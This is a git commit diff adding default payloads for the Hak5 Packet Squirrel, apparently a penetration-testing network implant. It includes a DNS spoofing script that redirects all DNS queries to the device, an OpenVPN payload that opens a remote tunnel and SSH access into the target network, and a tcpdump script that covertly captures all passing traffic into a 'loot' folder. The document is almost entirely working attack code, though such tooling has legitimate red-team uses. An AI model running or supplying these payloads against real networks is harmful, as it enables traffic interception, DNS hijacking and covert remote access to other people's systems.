Pushed default payloads

payloads/library/README.md

@@ -0,0 +1 @@
+# Hak5 Packet Squirrel Payloads

payloads/library/dnsspoof/payload.sh

@@ -0,0 +1,29 @@
+#!/bin/bash
+# DNSSpoof payload
+
+
+function setup() {
+	# Show SETUP LED
+	LED SETUP
+
+	# Set the network mode to NAT
+	NETMODE NAT
+	sleep 5
+
+	# Copy the spoofhost file to /tmp/dnsmasq.address
+	cp $(dirname ${BASH_SOURCE[0]})/spoofhost /tmp/dnsmasq.address &> /dev/null
+
+	# Restart dnsmasq with the new configuration
+	/etc/init.d/dnsmasq restart	
+}
+
+function run() {
+	# Show  ATTACK LED
+	LED ATTACK
+
+	# Redirect all DNS traffic to ourselves
+	iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53	
+}
+
+setup
+run

payloads/library/dnsspoof/spoofhost

@@ -0,0 +1,2 @@
+address=/#/172.16.32.1
+

payloads/library/openvpn/payload.sh

@@ -0,0 +1,55 @@
+#!/bin/bash
+# OpenVPN payload
+
+# Set to 1 to allow clients to use the VPN
+FOR_CLIENTS=0
+
+DNS_SERVER="8.8.8.8"
+
+# Cheap hack to set the DNS server
+function setdns() {
+	while true
+	do
+		[[ ! $(grep -q "$DNS_SERVER" /tmp/resolv.conf) ]] && {
+			echo -e "search lan\nnameserver $DNS_SERVER" > /tmp/resolv.conf
+		}
+		sleep 5
+	done
+}
+
+function start() {
+	LED SETUP
+
+	DIR=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)
+
+	# Update factory default payload
+	cp ${DIR}/payload.sh /root/payloads/switch3/payload.sh
+
+	# Set NETMODE to BRIDGE and wait 3 seconds
+	# to ensure that things can settle
+	
+	[[ "$FOR_CLIENTS" == "1" ]] && {
+		/usr/bin/NETMODE VPN
+	} || {
+		/usr/bin/NETMODE BRIDGE
+	}
+	sleep 3
+
+	# Make OpenVPN use the local configuration
+	uci set openvpn.vpn.config="${DIR}/config.ovpn"
+	uci commit
+
+	# Start the OpenVPN server in the background
+	/etc/init.d/openvpn start
+
+	# Start SSH Server
+	/etc/init.d/sshd start &
+
+	# Set DNS server
+	setdns &
+
+	LED ATTACK
+}
+
+# Start the payload
+start &

payloads/library/tcpdump/payload.sh

@@ -0,0 +1,57 @@
+#!/bin/bash
+# TCPDump payload v1.0
+
+function monitor_space() {
+	while true
+	do
+		[[ $(df | grep /mnt | awk '{print $4}') -lt 10000 ]] && {
+			kill $1
+			LED G SUCCESS
+			sync
+			break
+		}
+		sleep 5
+	done
+}
+
+function finish() {
+	# Kill TCPDump and sync filesystem
+	kill $1
+	wait $1
+	sync
+
+	# Indicate successful shutdown
+	LED R SUCCESS
+	sleep 1
+
+	# Halt the system
+	LED OFF
+	halt
+}
+
+function run() {
+	# Create loot directory
+	mkdir -p /mnt/loot/tcpdump &> /dev/null
+	
+	# Set networking to TRANSPARENT mode and wait five seconds
+	NETMODE TRANSPARENT
+	sleep 5
+	
+	# Start tcpdump on the bridge interface
+	tcpdump -i br-lan -w /mnt/loot/tcpdump/dump_$(date +%Y-%m-%d-%H%M%S).pcap &>/dev/null &
+	tpid=$!
+
+	# Wait for button to be pressed (disable button LED)
+	NO_LED=true BUTTON
+	finish $tpid
+}
+
+
+# This payload will only run if we have USB storage
+[[ ! -f /mnt/NO_MOUNT ]] && {
+	LED ATTACK
+	run &
+	monitor_space $! &
+} || {
+	LED FAIL
+}

payloads/switch1/payload.sh

@@ -0,0 +1,4 @@
+#!/bin/bash
+
+NETMODE NAT
+LED ATTACK

payloads/switch2/payload.sh

@@ -0,0 +1,4 @@
+#!/bin/bash
+
+NETMODE NAT
+LED ATTACK

payloads/switch3/payload.sh

@@ -0,0 +1,4 @@
+#!/bin/bash
+
+NETMODE NAT
+LED ATTACK